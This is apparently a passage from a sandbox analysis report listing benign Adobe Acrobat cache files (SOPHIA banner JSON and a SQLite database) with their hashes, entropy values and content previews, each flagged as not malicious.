                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJfBoTfXpnrPeUkwRe9:YvXKXpPtjx6mHDiVGWTfXcUkee9
                                                                                                                                              MD5:7F56F53804611580F3C267FB7770F4EF
                                                                                                                                              SHA1:3A5270DFE1780AB2DCCC274F9599B3AF3155C9D1
                                                                                                                                              SHA-256:1F1C4297DA4E4F659FFAE4277F3BDB8ACC37FB02844BCAEC212AA00FCCD5A405
                                                                                                                                              SHA-512:FACF2CF411D512126E95789AF8103F5301E3D39BB587BDC7279B509D681B90D811282C9DB672069C8904D0464C6D1BC56A0654A62773E4F77AA8C274EA53E31B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):294
                                                                                                                                              Entropy (8bit):5.281873088374282
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJfBD2G6UpnrPeUkwRe9:YvXKXpPtjx6mHDiVGR22cUkee9
                                                                                                                                              MD5:233E94885072F54DCC244691D697B8FE
                                                                                                                                              SHA1:F8B48F2FD946636BA92CBBF4CC710B8660D73E5B
                                                                                                                                              SHA-256:B46CD0AAAC13F3A5DCC2C333A15A1158105622A4E1BFBB872A2855549B8F0688
                                                                                                                                              SHA-512:9C47B17DC049D6D465A3FB88819C36198F63D6411CCBA39717AF22457ADE2FCF3A021261287D49CA16C6FE6CC85925CD619C08C2F956B19275AD9B451D7D2771
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):285
                                                                                                                                              Entropy (8bit):5.3395643804109705
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJfPmwrPeUkwRe9:YvXKXpPtjx6mHDiVGH56Ukee9
                                                                                                                                              MD5:A302691212B117F34B2228B46C02A75F
                                                                                                                                              SHA1:6F7013F694205E0BFB11AA828190B27F1DF8DBDF
                                                                                                                                              SHA-256:7C3834C153D8B73B3D4A04FA8FBE0502822190C47D88C12A4D4F9A3573B7CFB9
                                                                                                                                              SHA-512:BA85D402820AE85F17B15D37773D085306726D7CA1AB190521F22325AF79467CEAB38A62DF91EED714D93EAD38E6AB1BC34F53E5E529660CE116E041E1CA3361
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2113
                                                                                                                                              Entropy (8bit):5.8443043659924125
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Yv6XNtd6CD7pLgEGycjycR84bNerISIedJGWQxiE5iODneLKnlYMfNcQbpEsrArq:Yv88i7hgly48Y/TWCjiOumNcvKOrkU0
                                                                                                                                              MD5:1E01BBEEFB20A925C1369E86348344A9
                                                                                                                                              SHA1:27C9F92BA154BAE12FA39597E6625E9DB3542A66
                                                                                                                                              SHA-256:EFFC49421CC292935E434BD6C82D5A1F05FB004CC847637994226101661CEA87
                                                                                                                                              SHA-512:6204EBAFC38775C8FF36535342A569615C317BED3BCA05058BE74C6E19B78EDC3BBCC0EAFFAC6B58C75AEC9690191FFBCA61C08E19B225A9487E6B2E6B6F992B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_1","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"5a9d1955-ab74-4b89-837a-074b702313c0","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2NvbnZlcnQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRXhwb3J0IFBERnMgdG8gTWljcm9zb2Z0IFdvcmQgYW5kIEV4Y2VsLiIsImN0YUxhYmVsIjpudWxsLCJjdGFCZWhhdmlvciI6bnVsbCwiY3RhVXJsIjpudWxsLCJjdGFVcmxUeXBlIjpudWxsLC

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):289
                                                                                                                                              Entropy (8bit):5.290736186297949
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJf8dPeUkwRe9:YvXKXpPtjx6mHDiVGU8Ukee9
                                                                                                                                              MD5:1D9ABEB8C98DA43C532235EFAE1035E8
                                                                                                                                              SHA1:E1D796B350E1045F8D05D198B98E46FCD6BCE94B
                                                                                                                                              SHA-256:8BC779B18DE0BC955A95085216067124D407487784F70638F42AD4890A0A5466
                                                                                                                                              SHA-512:F1C87FC0BDD364BE20C9C77416D1F3F1E0B6BC4895A459786F5C17B0C2566ACD11C625D572783D8A5EB80819775EB4541BB9CE72829EEA83482F651BFDA75963
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):5.291804761884041
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJfQ1rPeUkwRe9:YvXKXpPtjx6mHDiVGY16Ukee9
                                                                                                                                              MD5:4A90EE0090F39E5B919CBD04EC7E24C7
                                                                                                                                              SHA1:585309E9D5C289DD70C8AD19124C063D992CB7A6
                                                                                                                                              SHA-256:5A80030FEDCD5E1987F4444068FBA444936441BAD88E8224A54F17FB7877A8A7
                                                                                                                                              SHA-512:67A6725F78F069123629BB01EDFA064DD1A0CB35A8ABE970B134B785FD72DDD2E95011E89213BE362613CF3063EF620FEC2EC744502E91E6A9CAA8829D277C3A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2064
                                                                                                                                              Entropy (8bit):5.827078697474294
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:Yv88imogbN48l/GiyLVzyODRHKOkQDcSmjWA0:G8PVg54Y/IVO4QOkQoSmM
                                                                                                                                              MD5:D338C0A71A18FC65AEC881FC6DAA8E00
                                                                                                                                              SHA1:522A28F17EF8A7F8FB05BA658254E0B384C21626
                                                                                                                                              SHA-256:FC68F5C9B621261E1099BB1081FD2D814A3C202A5637C87C68947910219C7B81
                                                                                                                                              SHA-512:EAAD710AD8F7E6A5F8F14003F008ABB026239E0BA7FD7C00515402644E6F1F93F7B66A58517272A62640AEB9486A1C983394B77C29D4C7281E27AFBAB8216C92
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_2","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"164bf29d-ee04-491c-adf2-c0bfeedb2d1b","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2VkaXQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjpudWxsLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGFkYXRhIjp7InN0cmluZ01ldGFkYXRhIjp

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):295
                                                                                                                                              Entropy (8bit):5.316566790588855
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJfzdPeUkwRe9:YvXKXpPtjx6mHDiVGb8Ukee9
                                                                                                                                              MD5:4E9798BE2704169ACA615044C1927AF7
                                                                                                                                              SHA1:F7968DF7757CE6B87BFECFBFD510A0DC8EE2FBF1
                                                                                                                                              SHA-256:0F53682CDAC5C790A3BB2766246AB4C9AA34A0D4A2214A88BAD303C8ACB921A8
                                                                                                                                              SHA-512:3E8DD9A386BF0C001D8F791A51BA39459A570BBC76E9E3336CE5D71EE603E0D4052924AD86EDB3206B51E7AC3B157CF1591B1EAAE59B9AC143936889A85CA777
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):289
                                                                                                                                              Entropy (8bit):5.297152467680954
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJfYdPeUkwRe9:YvXKXpPtjx6mHDiVGg8Ukee9
                                                                                                                                              MD5:E1F70A9C93DBFF111073CD848A72DF11
                                                                                                                                              SHA1:DDB0980ACD4BAF630C0E5CC3AADB9EC6A3018B53
                                                                                                                                              SHA-256:2BE0AEDA21E32B0FB4BC9BD08572AEAEEF0C649DA9CF73F4926B9CADA6725E4E
                                                                                                                                              SHA-512:69F112068BDFE5ACC685DAA95648D7B892E035CAFC22BEA7BFEFF05609209EB9AF1BF56045B148BF93220D68150F2C8FD82EED6C390E3E7BAE5E4D5CF337951D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):284
                                                                                                                                              Entropy (8bit):5.283451698820219
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJf+dPeUkwRe9:YvXKXpPtjx6mHDiVG28Ukee9
                                                                                                                                              MD5:5F8D1BDA32541A8C56C9FE6596DDAB5D
                                                                                                                                              SHA1:EB6CEA2E5A67E5B54F2F68AE85FECC318992FE2C
                                                                                                                                              SHA-256:072B3B91D717324D5DC19074861C94DC1BF414C25DD508A056A7CF3E5DF44A17
                                                                                                                                              SHA-512:B186F47A254A6C73C36B320FB701D8E61DFD3E872F6C1876EF298C374C3FE922D56A0C066C8F32231F4A8399A345E8831FCC36DB778447628EBAA47F6C97A8B6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):291
                                                                                                                                              Entropy (8bit):5.280719136023677
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJfbPtdPeUkwRe9:YvXKXpPtjx6mHDiVGDV8Ukee9
                                                                                                                                              MD5:1423B30D9F891BD3888DEAE98D6A01D9
                                                                                                                                              SHA1:F3925273B5B5F8142A277A03D1DFF6EED42D41D6
                                                                                                                                              SHA-256:80406CD4A9302CBF9B7BFE9CD59D1BB3B36F7D6510259BCA411C6B24AFBD87DC
                                                                                                                                              SHA-512:A6A9FF11A8261F85B75A7924D837EE417CADAF86B94C727F510FEEDFAB1B02CE4D1BA6E814565F422DE67CE0FBD02F28DF95FE7ED0CA28890D2ED921FCED063A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):287
                                                                                                                                              Entropy (8bit):5.28235294120738
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJf21rPeUkwRe9:YvXKXpPtjx6mHDiVG+16Ukee9
                                                                                                                                              MD5:0AA6C7AB6BBD96C204B8ABC244898090
                                                                                                                                              SHA1:7D13747FD7F8931F0D32219A5B596F8170F15096
                                                                                                                                              SHA-256:68420882BB2C5EEE261FC338417C1F9B492298F67E5F2F469167812678F59883
                                                                                                                                              SHA-512:3DD7CA73B392DE78A4340225A539FD7C29553B0BF913540BD144BC19A7FCCB3900BF115DD28BC8D9C3EB71F68B9A8B9F854100DF28AC70F9CAB3281E547FFBBA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2012
                                                                                                                                              Entropy (8bit):5.839692467580294
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Yv6XNtd6CD7amXayLgEdycgNaLcR84bqerISIQ1iyLPZYMWD8W3V1LFnU6QHlOBD:Yv88iLBgBG48j/SiyLVWOAI13kU0
                                                                                                                                              MD5:FFD4D1CD3EF5E71C6CC96CC1D0BA9225
                                                                                                                                              SHA1:E8DCB84979E3AFD8AE6C2079EC08AEB29DC37236
                                                                                                                                              SHA-256:0B074997676409D6775C4AB820C849AB17BF03CF2116963DBC36655A7E89E735
                                                                                                                                              SHA-512:647F0715FE8C18C99B15759C43905C522CD71F84069A4B766AAD9A80D42DBFB78FD8FE7D55AE504E58E4730883CE94AFB3774B6AFA313B44A3AED0F47E2D8E9A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_0","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"339c0ba6-2e61-4622-82f6-f07787d206b8","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL3NpZ24iLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRWFzaWx5IGZpbGwgYW5kIHNpZ24gUERGcy4iLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGF

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):286
                                                                                                                                              Entropy (8bit):5.258989561475845
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJfshHHrPeUkwRe9:YvXKXpPtjx6mHDiVGUUUkee9
                                                                                                                                              MD5:8232B00DD37FD23E72A900D2CD2D987F
                                                                                                                                              SHA1:772FCE03B4171E2ED6D018ADD6849019A4A66724
                                                                                                                                              SHA-256:91AD1FAE653F10E623D913E645DD6410BC5B01FF01EB48FA992649B553C1C48F
                                                                                                                                              SHA-512:8C167FB6B0A31397105D1D6644B697C82C6C529BB21D1A3B267F375A41DF32A925B5CF010E820E07EB60B0753576DBBD3DD39BADFF145F63F0A7F5FD8666B665
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):282
                                                                                                                                              Entropy (8bit):5.259728998299483
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YEQXJ2HXpHPXtjx6mJ0YWxQdpieoAvJTqgFCrPeUkwRe9:YvXKXpPtjx6mHDiVGTq16Ukee9
                                                                                                                                              MD5:D31D793C7FFDBC6A72D869F7A12C36C6
                                                                                                                                              SHA1:635CE20C488A2A196C3AC86D0DF9CC777F656A61
                                                                                                                                              SHA-256:C2B527BC6C7ECA18E2A4D53C5DB002DD8941604122EE6A0AD4CBEAB78838C9DD
                                                                                                                                              SHA-512:DCA4956E10CFAB3EC6DFB55063E4C8D4D95A9EEADDF60FF4E65E18961C5FF47271DE9AB2E5B4EB20476FA51EABACE3C767FFCB4C61A282BACC1D0CF216B0F94D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"5a368302-ab4e-4d47-b078-955212ec572b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1742422085858,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4
                                                                                                                                              Entropy (8bit):0.8112781244591328
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:e:e
                                                                                                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:....

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2815
                                                                                                                                              Entropy (8bit):5.121023871335715
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Yq5+mS6u1baSgayx8iPklEJv5OCI+Gv9jmQjSj0S0r2Qmss12LS04C+hwqMMjb3f:YQcRE+CIpkEPmsyN56qM+b3w7Z9HE
                                                                                                                                              MD5:FAB9C7C7D84671F98B8CDC855B4E1722
                                                                                                                                              SHA1:127C8A6CAB5000EE029203679904C4C3319693E5
                                                                                                                                              SHA-256:5F58828174458CA326BCCEDBEFA9EAB329BFEC3C5BA73EE04A875E8F0B01267D
                                                                                                                                              SHA-512:73E6EC2FC33FE35C35A9E60EEB8FF57CC62DC23821ACC0BD5D4D41C1DBDFDFD8736CF8726F2D06F6BC8C1B46284B115094416060598444F789A9739375244A6A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"7ff62b4bd6167f97daec298a78eb7748","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1742245025000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"388d4597ccd2d1b1352ebeff7d5f0e60","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2064,"ts":1742245025000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"82755ebc3c2b3d9626eece864dd99c67","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":2113,"ts":1742245025000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"255264bf52c4816e95040a81353e2493","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":2012,"ts":1742245025000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"5f65dd32b91db1dd73c4d64aa334ad99","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1742245025000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"86e41345af43d6bb60a2134d59624ae8","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size"

                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 23
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12288
                                                                                                                                              Entropy (8bit):1.3567662944703347
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:TVl2GL7msncRVbjVpOV6cV6+VZeVZvVZCVZW/Vk/Vhjv2ubCs22LT5BvPf:vVmssZnrFotX
                                                                                                                                              MD5:44297625956CB65216E6B97FACC1CA49
                                                                                                                                              SHA1:4016B77BA7958AB2551A3E32B612D60C9EFAE7ED
